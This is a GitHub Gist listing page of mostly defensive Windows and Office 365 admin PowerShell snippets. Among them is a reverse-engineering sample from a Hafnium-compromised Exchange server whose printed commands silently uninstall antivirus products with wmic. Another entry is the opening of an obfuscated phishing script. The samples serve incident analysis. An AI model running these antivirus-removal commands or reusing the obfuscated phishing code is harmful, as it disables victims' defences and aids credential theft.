Skip to content

Instantly share code, notes, and snippets.

@technion
technion / AutorunsVT.ps1
Created Apr 23, 2021
Review CSV file from autorunsc.exe a and handle Virustotal detections
View AutorunsVT.ps1
$autorunsCsv = "\AutorunsOutput.csv"
$autorunsArray = Import-Csv $autorunsCsv
Foreach ($item in $autorunsArray) {
$detection = $item.'VT detection'
if ($detection -eq "" -or $detection -eq 'Unknown') {
continue
}
Write-Output $detection
@technion
technion / Malicious.ps1
Created Mar 20, 2021
RE on Hafnium exploited server
View Malicious.ps1
$v='ipc';
cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
@technion
technion / LicenseManagement.ps1
Created Nov 13, 2020
Office 365 license management
View LicenseManagement.ps1
Set-StrictMode -Version 2
# Connect first
# Connect-AzureAD
function Get-LicencesforUser
{
param([object]$user)
# $user should be populated with
# $user = Get-AzureADUser -ObjectId username@domain.com
@technion
technion / tank.wa
Created Nov 12, 2020
Warlock tanking weak aura
View tank.wa
!WA:2!1zvZUTTrq4YOwKc1IcB3a30FqbtBtacqRQLsIDQrqqfTLtuJSTcLSDcGrLwYDL42qUC7UlTLuVjKd5SEe0HCOON0JGFcim6tGrFc8lq7SKuYQUUxKwoC2DN5B(MVHgBTuWs4LWVX3jsseT6Bmjiet8Rk3JrvELqCQNO3UD6ijkJjyQK7J63K0tDnr)PwrmxVqr9qkt5SrLDAwXEItOateBe6hk(PC5Yvp3kfEWejkGO3AKG0UuKW)AN7GCFvxryedN6AIFx6NZFfHWll5exLnsrd9gNeGT4iLh)wGDFF53JeUigHhEmKcsfsrA56rKQcbLSWePl)PLzm4ACjsZgEiC4XorcMPGiPsL0KYmD9qktCKGY6AQ8iMnpgmwjGteHcPjH5c7wrefgkcv6OGzy1jKP4lSLGoW85riSaPqMnB64kc5T6x)DxPW9lEUknDpqG4BdrT9g1kVD9HsYVgbhjjhFXoHcskcKHm8vRQVOoixYHLX4qM8WdiOxvosGKhwxNGjl3MGPOdtTQ)9ENktYRxKwuYXxakNLX)sKurWe82uM3y4MGaVzFoXI6gYsl0aC1ks(8rAlvz66j)gUHH(WzX0H0MujYXNG9gj9rmLolCQUtJQBwzmSdmvJfY8ISen(ZMekOewkgnC)k2nRUr5ANKYhsJTpWcfPGYOk09iIqc(9(F7DNsTQch6nV2h)3wdcddmUief9(RfkfrXtw5(LTxBn7JSDWdDdd4qnu6LX3sI)pX(ykw5vK)5ZXwBb4Cas1INTWwrdiqjZnj8x1g4mc1(Ia4WqDj87E7Ifsyw7auwZh)y7eIcb)Ohz(DMLFYtS31SAdZgpTAtUz2EMEdflaeoLEFzwSyHmYjt9sbOFPgLFj)w)N9n7cZmfV(yCyRm3ABrH(X8oDG)KE5h3H2JGpqNOV(dVaLudm4lCrtvkE)EWALpLb4)EnRvDNk8BaHickxqFI1mN9olfe1wWahMVGLpDWaKaB2e4dkkFKK43jTn3A3Mn3DBB3Pn4gos
@technion
technion / Scan-Netlogon-Secure.ps1
Last active Aug 16, 2020
Search domain controllers for events relating to Netlogon vulnerability
View Scan-Netlogon-Secure.ps1
# More information: https://support.microsoft.com/en-au/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc
Set-StrictMode -Version 2
# Fetch all Domain Controllers. Use this pattern to fetch from all sites.
$addomain = Get-ADDomain
$controllers = Get-ADComputer -filter * -SearchBase "OU=Domain Controllers,$($addomain.DistinguishedName)"
foreach ($dc in $controllers) {
# Errors are ignored so as not to throw an exception if there are no such logs found
Get-WinEvent -FilterHashtable @{logname='system'; id=5827,5828,5829,5830,5831} -ComputerName $dc.Name -ErrorAction Ignore
@technion
technion / phishing.js
Last active Aug 12, 2020
blog of phishing code
View phishing.js
'use strict';
/** @type {!Array} */
var _0xd60a = ["call", "unknown BTYPE: ", "innerHTML", "lazy", "invalid code length: ", "subarray", "createElement", "invalid compression type", "decompress", "input buffer is broken", "POSITIVE_INFINITY", "index", "verify", "charCodeAt", "bufferSize", "invalid uncompressed block header: LEN", "var ", "compile", "fromCodePoint", "finish", "bufferType", "shift", "compressionType", "input", "Zlib.Inflate.prototype.decompress", "invalid inflate mode", "slice", "NONE", "appendChild", "length", "string",
"Zlib.Inflate", "textContent", "prototype", "Zlib.Deflate.compress", "resize", "number", "invalid index", "documentElement", "buffer", "undefined", "trim", "unsupported compression type", "keys", "constructor", "Inflate", "unsupported compression method", "a9ae92d3-ee4f-4bc1-a8c5-7cff21373a99", "split", 'return /" + this + "/', "invalid adler-32 checksum", "getParent", "close", "invalid length: ", "push", "fromCharCode", "invalid code: ", "Zlib.Deflate.CompressionType", "write"
@technion
technion / Hyper-V VM Use Report.ps1
Created Jul 14, 2020
Report on whole VM cluster in csv format
View Hyper-V VM Use Report.ps1
$nodelist = Get-Clusternode -Cluster cls
$vmdata = @()
foreach ($node in $nodelist) {
$vmList = Get-VM -ComputerName $node.Name | where { $_.name -notlike '*_replica' }
foreach ($vm in $vmList) {
$UtilSummaryObj = New-Object System.Object
View User duplicate provisioning.ps1
Set-StrictMode -Version 2
Add-Type -AssemblyName 'System.Web'
$adusers = Get-ADGroupMember "Team"
foreach ($user in $adusers) {
$newname = "$($user.Samaccountname).delegate"
$password = [System.Web.Security.Membership]::GeneratePassword(12, 0)
$secPw = ConvertTo-SecureString -String $password -AsPlainText -Force
@technion
technion / AzureGroups.ps1
Created Apr 30, 2020
Adds all AzureAD users with a certain license to a group
View AzureGroups.ps1
$skus = Get-AzureADSubscribedSku
# Exchange Online E1
$skue1 = ( $skus | where { $_.skupartnumber -eq 'EXCHANGESTANDARD' } ).SkuID
$members = Get-AzureADUser -All $true
foreach($member in $members) {
if ($member.ImmutableId -eq $null) {
# Cloud user - skip
@technion
technion / Check-CVE-2020-0688.ps1
Created Apr 7, 2020
Scan Exchange server for CVE-2020-0688 vulnerability
View Check-CVE-2020-0688.ps1
Set-Strictmode -Version 2
$path = Get-WebApplication ecp
$ecppath = $path | where { $_.PhysicalPath -match 'Client' }
$found = Select-String validationKey -Path "$($ecppath.PhysicalPath)\web.config"
if ($found) {
Write-host "Server is vulnerable" -ForegroundColor Yellow
} else {
write-host "Server is not vulnerable"
}